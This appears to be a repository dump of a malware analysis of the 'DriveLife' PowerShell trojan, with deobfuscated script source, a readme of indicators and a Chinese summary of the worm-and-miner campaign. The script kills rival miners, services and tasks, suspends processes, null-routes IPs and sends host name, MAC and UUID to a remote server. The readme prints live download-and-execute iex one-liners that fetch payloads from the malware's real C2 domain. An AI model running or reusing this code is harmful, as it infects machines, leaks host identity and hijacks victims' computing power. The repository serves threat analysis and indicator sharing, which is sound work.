PID);[DllImport("kernel32.dll")] public static extern int DebugActiveProcessStop(int PID);}' 209 | 210 | function ProcessSuspend($id){ 211 | 212 | $procName = (Get-Process -id $id -ErrorAction SilentlyContinue).name 213 | 214 | if($procName -eq $null){ 215 | 216 | Write-Host "ERROR: There is no process with an ID of $id" 217 | 218 | return 219 | 220 | } 221 | 222 | Write-host "Attempting to suspend $procName (PID: $id)..." 223 | 224 | if ($id -le 0) { 225 | 226 | write-host "You didn't input a positive integer" 227 | 228 | return 229 | 230 | } 231 | 232 | $debug = whoami /priv | Where-Object{$_ -like "*SeDebugPrivilege*"} 233 | 234 | if($debug -ne $null){ 235 | 236 | $DebugPresent = [IntPtr]::Zero 237 | 238 | $out = [Kernel32]::CheckRemoteDebuggerPresent(((Get-Process -Id $id).Handle),[ref]$debugPresent) 239 | 240 | if ($debugPresent){ 241 | 242 | write-host "There is already a debugger attached to this process" 243 | 244 | return 245 | 246 | } 247 | 248 | $suspend = [Kernel32]::DebugActiveProcess($id) 249 | 250 | if ($suspend -eq $false){ 251 | 252 | write-host "ERROR: Unable to suspend $procName (PID: $id)" 253 | 254 | } 255 | 256 | else{ 257 | 258 | write-host "The $procName process (PID: $id) was successfully suspended!" 259 | 260 | } 261 | 262 | } 263 | 264 | else{ 265 | 266 | write-host "ERROR: You do not have debugging privileges to pause any process" 267 | 268 | return 269 | 270 | } 271 | 272 | } 273 | 274 | function gmd5($d){ 275 | 276 | [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} 277 | 278 | return $l 279 | 280 | } 281 | 282 | function getprotected(){ 283 | 284 | function getrname(){ 285 | 286 | function gmd5($d){ 287 | 288 | [Security.Cryptography.MD5]::Create().ComputeHash($d)|foreach{$l+=$_.ToString('x2')} 289 | 290 | return $l 291 | 292 | } 293 | 294 | $rpath="C:\Windows\System32\Windowspowershell\V1.0" 295 | 296 | $enames = gci "$rpath\*" -Include *.exe -Exclude powershell.exe|foreach{$_.name} 297 | 298 | $tmd5 = gmd5 ([IO.File]::ReadAllBytes("$rpath\powershell.exe")) 299 | 300 | foreach($ename in $enames){ 301 | 302 | $md5_=gmd5 ([IO.File]::ReadAllBytes("$rpath\$ename")) 303 | 304 | if($tmd5 -eq $md5_){ 305 | 306 | return $ename 307 | 308 | } 309 | 310 | } 311 | 312 | return "NULLNULL" 313 | 314 | } 315 | 316 | $comp_name = $env:COMPUTERNAME 317 | 318 | $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID 319 | 320 | $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 321 | 322 | $m6exe=(gmd5 ([system.Text.Encoding]::UTF8.GetBytes($comp_name+$guid+$mac))).substring(0,6) 323 | 324 | $pids=@() 325 | 326 | $pids+=Get-WmiObject -Class Win32_Process|Where-Object{$_.path -like '*m6g.bin.exe*' -or $_.path -like '*m6.bin.exe*' -or $_.path -like "*$m6exe*" -or $_.name -eq (getrname)}|foreach{$_.processid} 327 | 328 | return $pids 329 | 330 | } 331 | 332 | function sendmsg($ip,$ismproxy,$mpid){ 333 | 334 | try{ 335 | 336 | $mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1 337 | 338 | $guid = (get-wmiobject Win32_ComputerSystemProduct).UUID 339 | 340 | $comp_name = $env:COMPUTERNAME 341 | 342 | if($ip -eq ''){ 343 | 344 | $url = "$down_url/kl_repo.json?$version&$global:retry&$comp_name&$mac&$guid" 345 | 346 | } else { 347 | 348 | $pname = Get-Process -id $mpid | Select-Object -ExpandProperty Name 349 | 350 | $url = "$down_url/rellik.json?$version&$global:retry&$comp_name&$mac&$guid&$ip&$ismproxy&$mpid&$pname" 351 | 352 | } 353 | 354 | (New-Object Net.WebClient).DownloadString($url) 355 | 356 | }catch{} 357 | 358 | } 359 | 360 | function banIp($ip){ 361 | 362 | route add $ip 0.0.0.0 IF 1 -p 363 | 364 | } 365 | 366 | function unbanIp($ip){ 367 | 368 | route delete $ip 0.0.0.0 369 | 370 | } 371 | 372 | Function Killer { 373 | 374 | $SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks" 375 | 376 | write-host "kill services..." 377 | 378 | foreach($Srv in $SrvName) { 379 | 380 | $Null = SC.exe Config $Srv Start= Disabled 381 | 382 | $Null = SC.exe Stop $Srv 383 | 384 | $Null = SC.exe Delete $Srv 385 | 386 | } 387 | 388 | 389 | $TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore" 390 | 391 | write-host "kill tasks..." 392 | 393 | foreach ($Task in $TaskName) { 394 | 395 | SchTasks.exe /Delete /TN $Task /F 2> $Null 396 | 397 | } 398 | 399 | 400 | $Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost", 401 | 402 | "SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update", 403 | 404 | "carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores" 405 | 406 | write-host "kill processes..." 407 | 408 | foreach ($m in $Miner) { 409 | 410 | Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force 411 | 412 | } 413 | 414 | $tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue 415 | 416 | 417 | if($tm -eq $null){ 418 | 419 | Start-Process -WindowStyle hidden -FilePath Taskmgr.exe 420 | 421 | } 422 | 423 | $tcpconn = NetStat -anop TCP 424 | 425 | $ipcache=@('170.187.149.77:80','138.68.186.90:80','176.58.99.231:80','138.68.251.24:80','165.227.62.120:443','202.182.120.192:443','178.62.2.194:443','138.68.4.19:443','176.58.99.231:443','138.68.251.24:443','85.117.234.189:443','159.203.122.42') 426 | 427 | foreach($tempip in $ipcache){ 428 | 429 | unbanIp $tempip 430 | 431 | } 432 | 433 | $ppids = getprotected 434 | 435 | write-host "kill connections..." 436 | 437 | foreach ($t in $tcpconn) { 438 | 439 | $line = $t.split(' ')| ? {$_} 440 | 441 | if ($line -eq $null) { continue } 442 | 443 | if ($t.contains("LISTENING") -and ($line[1].contains("43669") -or $line[1].contains("43668"))) { 444 | 445 | $ppids += $line[-1] 446 | 447 | continue 448 | 449 | } 450 | 451 | if($t.contains("ESTABLISHED") -and ($line[2].gettype() -eq "".gettype()) -and ($line[2].indexOf(":") -ne -1)){ 452 | 453 | $ip,$port = $line[2].split(':') 454 | 455 | $currpid = $line[-1] 456 | 457 | if(($ipcache -contains $line[2]) -or ($ppids -contains $currpid) -or ($ip.length -lt 4) -or -not(isPubIP $ip) -or ($port -le 0)){ 458 | 459 | continue 460 | 461 | } 462 | 463 | if($global:ipdealcache -contains $line[2]){ 464 | 465 | ProcessSuspend $currpid 466 | 467 | banIp $ip 468 | 469 | continue 470 | 471 | } 472 | 473 | write-host "try $ip $port..." 474 | 475 | if(((ishttp $ip $port) -eq $false) -and ((ishttps $ip $port) -eq $false)){ 476 | 477 | write-host "end http test..." 478 | 479 | $ismproxy = 0 480 | 481 | if((isminerproxy $ip $port) -eq $true){ 482 | 483 | $ismproxy = 1 484 | 485 | } else{ 486 | 487 | if((isminerproxys $ip $port) -eq $true){ 488 | 489 | $ismproxy = 2 490 | 491 | } 492 | 493 | } 494 | 495 | if($ismproxy -ne 0){ 496 | 497 | ProcessSuspend $currpid 498 | 499 | banIp $ip 500 | 501 | $global:ipdealcache += $line[2] 502 | 503 | sendmsg $line[2] $ismproxy $currpid 504 | 505 | } 506 | 507 | } 508 | 509 | if($ipcache -notcontains $line[2]){$ipcache += $line[2]} 510 | 511 | } 512 | 513 | } 514 | 515 | $global:retry++ 516 | 517 | } 518 | 519 | $start_time=Get-Date -UFormat "%s" 520 | 521 | $global:ipdealcache=@() 522 | 523 | $global:retry=0 524 | 525 | $ser=[System.Net.Sockets.TcpListener]65529 526 | 527 | $ser.start() 528 | 529 | while($true){ 530 | 531 | if(((Get-Date -UFormat "%s")-$start_time) -gt 60000) {break} 532 | 533 | "try to kill..." 534 | 535 | Killer 536 | 537 | "kill done..." 538 | 539 | Start-Sleep -Seconds 600 540 | 541 | } 542 | 543 | 544 | -------------------------------------------------------------------------------- /DriveLife/powershell-beautiful/readme.md: -------------------------------------------------------------------------------- 1 | 可疑命令 2 | ``` 3 | /c powershell iex(new-object net.webclient).downloadstring('http://d.bb3u9.com/if.bin?once'), 4 | 5 | iex(new-object net.webclient).downloadstring('http://d.bb3u9.com/if.bin?once') 6 | 7 | /mimi.dat?v=&r=3 8 | http://bb3u9.com/mimi.dat?v=&r=1 9 | http://bb3u9.com/mimi.dat?v=&r=2 10 | http://bb3u9.com/mimi.dat?v=&r=3 11 | ``` 12 | 13 | 其他子域名 14 | 15 | ``` 16 | t.bb3u9.com 17 | www.bb3u9.com 18 | d.bb3u9.com 19 | httpt.bb3u9.com 20 | www.ww.bb3u9.com 21 | https://http://wwww.bb3u9.com 22 | t.zer9g.comt.bb3u9.comt.zz3r0.comt.bb3u9.com 23 | www.d.bb3u9.com 24 | xn--t-dr6ao2adwp8fwwok2mphn.bb3u9.com 25 | u.bb3u9.com 26 | feei-esd-9364.bb3u9.com 27 | _.bb3u9.com 28 | www.t.bb3u9.com 29 | ``` 30 | 31 | 32 | 33 | 注册邮箱 34 | 35 | ``` 36 | bb3u9.com-1ji77qlgie1pw@anonymize.com 37 | bb3u9.com-1iuspg1daqa1w@anonymize.com 38 | bb3u9.com-t4huqsdzgks6@anonymize.com 39 | bb3u9.com-1jel0lrgrjqr8@anonymize.com 40 | bb3u9.com-t4qoui6kea7s@anonymize.com 41 | bb3u9.com-1jym2d2x0cgty@anonymize.com 42 | bb3u9.com-qxl11vv8zk8n@anonymize.com 43 | bb3u9.com-to7b2wklotv5@anonymize.com 44 | bb3u9.com-1hr5wz32q3z1v@anonymize.com 45 | bb3u9.com@anonymize.com 46 | bb3u9.com@anonymize.com 47 | bb3u9.com-t8cx3007s6d2@anonymize.com 48 | bb3u9.com-s1go9s64p2zq@anonymize.com 49 | bb3u9.com-u7wu5chfyxq1@anonymize.com 50 | bb3u9.com-u8dg33xr8vna@anonymize.com 51 | bb3u9.com-1iyn9bv71ae5x@anonymize.com 52 | bb3u9.com-trqspo8kp73q@anonymize.com 53 | bb3u9.com-ts4qdzs8xf8i@anonymize.com 54 | bb3u9.com-r1g4hpxrpxlx@anonymize.com 55 | bb3u9.com-s1b38ei5rmn8@anonymize.com 56 | bb3u9.com-sopnepb8z6ue@anonymize.com 57 | bb3u9.com-qy1nbdj0iwrl@anonymize.com 58 | bb3u9.com-rlam25n7r22c@anonymize.com 59 | bb3u9.com-1jy5fs959nlfb@anonymize.com 60 | bb3u9.com-1jxzfh3v9afch@anonymize.com 61 | bb3u9.com-1hbd67n1kl1rq@anonymize.com 62 | bb3u9.com-1jecow57uowfm@anonymize.com 63 | bb3u9.com-r1fkonrsyxis@anonymize.com 64 | bb3u9.com-1jy5hcfk618af@anonymize.com 65 | bb3u9.com-vbbwclf9ewj4@anonymize.com 66 | bb3u9.com-rhdabysbrlus@anonymize.com 67 | bb3u9.com-uv5wh7jqmq1y@anonymize.com 68 | bb3u9.com-1ibbzyg6f6hr9@anonymize.com 69 | bb3u9.com-vey4l57627hh@anonymize.com 70 | bb3u9.com-1jyjbcvtryyib@anonymize.com 71 | bb3u9.com-sl3euuqrv6g5@anonymize.com 72 | bb3u9.com-sl0on11qq3hx@anonymize.com 73 | bb3u9.com-1jer0wur31mpl@anonymize.com 74 | bb3u9.com-u7umbhy6p2yd@anonymize.com 75 | bb3u9.com-rl7x0fmmu88g@anonymize.com 76 | bb3u9.com-qxtcu2tesmk0@anonymize.com 77 | bb3u9.com-tonzaea3izxf@anonymize.com 78 | bb3u9.com-s18dsray2ek0@anonymize.com 79 | bb3u9.com-1huzy7iop7lfb@anonymize.com 80 | bb3u9.com-ts56r2sbdk4z@anonymize.com 81 | bb3u9.com-1hvbksnpk1obl@anonymize.com 82 | bb3u9.com-1hv2ofc10qred@anonymize.com 83 | bb3u9.com-1iemnxwcl4boz@anonymize.com 84 | bb3u9.com-qhncw45fn60p@anonymize.com 85 | bb3u9.com-vf97lzrs5ffn@anonymize.com 86 | bb3u9.com-qxqmjmrlopbq@anonymize.com 87 | bb3u9.com-t4nd4grge3p1@anonymize.com 88 | bb3u9.com-rh5iymkkxmph@anonymize.com 89 | bb3u9.com-1h7z8g9p8gapg@anonymize.com 90 | bb3u9.com-ts4pj2z1mvkz@anonymize.com 91 | bb3u9.com-t4tf00atkppw@anonymize.com 92 | bb3u9.com-urek7bi84im1@anonymize.com 93 | bb3u9.com-qdt9pb2y7uxt@anonymize.com 94 | bb3u9.com-qxnrqb13kchj@anonymize.com 95 | bb3u9.com-s4xxm7exggtz@anonymize.com 96 | bb3u9.com-qxlilj8kid7n@anonymize.com 97 | bb3u9.com-qhw67nsgguuo@anonymize.com 98 | bb3u9.com-qxqklf9kas6p@anonymize.com 99 | bb3u9.com-s1dveddrc1tg@anonymize.com 100 | bb3u9.com-1jyaz946g85kk@anonymize.com 101 | bb3u9.com-ublwykv7qzi1@anonymize.com 102 | bb3u9.com-skmswt1h9xdd@anonymize.com 103 | bb3u9.com-1iyq3tz5k8oc2@anonymize.com 104 | bb3u9.com-urmee1ju146b@anonymize.com 105 | bb3u9.com-1hr5f1c6d32nk@anonymize.com 106 | bb3u9.com-1jym3x9og78ds@anonymize.com 107 | bb3u9.com-1hrgi53r7e52s@anonymize.com 108 | bb3u9.com-vf0uqhs73ho2@anonymize.com 109 | bb3u9.com-qxw63m8tf1ib@anonymize.com 110 | bb3u9.com-1iuy7rh4h4dv4@anonymize.com 111 | bb3u9.com-soq6kqewzsdd@anonymize.com 112 | bb3u9.com-vb42yel0it0m@anonymize.com 113 | bb3u9.com-ubj38hkajq5w@anonymize.com 114 | bb3u9.com-vbhwl3o4qjj7@anonymize.com 115 | bb3u9.com-qdw1hcw14b3s@anonymize.com 116 | bb3u9.com-1h7o64oq5cig5@anonymize.com 117 | bb3u9.com-1jei8tq2xzsj8@anonymize.com 118 | bb3u9.com-1k200fl5xpt9h@anonymize.com 119 | bb3u9.com-u7xe12x9l3jq@anonymize.com 120 | bb3u9.com-1h8230zmtt2d0@anonymize.com 121 | bb3u9.com-1hrjruc76ypte@anonymize.com 122 | bb3u9.com-1h823er8cmyjl@anonymize.com 123 | bb3u9.com-soq5so73byht@anonymize.com 124 | bb3u9.com-1ib6geqi6p8bq@anonymize.com 125 | bb3u9.com-1iyi8hh7z50zd@anonymize.com 126 | bb3u9.com-1k252241zf6t5@anonymize.com 127 | bb3u9.com-tnziupudw7l2@anonymize.com 128 | bb3u9.com-qeeyfiwqbxo0@anonymize.com 129 | bb3u9.com-1jym2fe3ykbc6@anonymize.com 130 | bb3u9.com-rkwscfpuk76t@anonymize.com 131 | bb3u9.com-rl560a5yealu@anonymize.com 132 | bb3u9.com-rhln7it5rsqe@anonymize.com 133 | bb3u9.com-1ji9zu553vayg@anonymize.com 134 | bb3u9.com-1hr8oqj3qlffq@anonymize.com 135 | ``` 136 | 137 | 138 | 139 | ``` 140 | ns3.epik.com support.epik.com 141 | 257 3 13 SN+RNCXaqYu+ee+A35F6MGWEpNFo58FdWH3Tu6w6L6DVhBlS5muJtgeIFrYWZ8TSiP4W4OZ7I8++8dqFVREeqg== 142 | 257 3 13 io+EGen36FvV4MqBsbx0iN9DjbvTO65LY7Vvb9h101HY6p6zSMrfHaV/Pu2/pEefXcGkVykD1dAuj51qwlyROA== 143 | 5422ef5ec3b31bbd18808d63faf9366290705050446b33e3ee55560886a944f3 144 | support.epik.com ns3.epik.com 145 | ``` 146 | 147 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DriveLife-PsTrojan 2 | TrojanDropper/PS.Maloader.d 3 | 4 | ### "驱动人生"病毒 简介 5 | 6 | ``` 7 | "驱动人生"病毒自2018年出现,至今出现多个变种,不断进行技术优化以躲避安全软件的查杀监测。 8 | 该病毒利用永恒之蓝漏洞、SMBGhost漏洞等多种高危漏洞对Windows、Linux下的主机进行入侵感染, 9 | 在入侵成功之后不仅会下载挖矿文件进行挖矿,还会释放传播模块继续入侵感染其他终端, 10 | 并且病毒所使用的Powershell脚本经过多层混淆用以逃避安全软件的查杀。 11 | ``` 12 | 13 | ![](./DriveLife/images/BruteSMB.png) 14 | ![](./DriveLife/images/GetIpaddrs.png) 15 | --------------------------------------------------------------------------------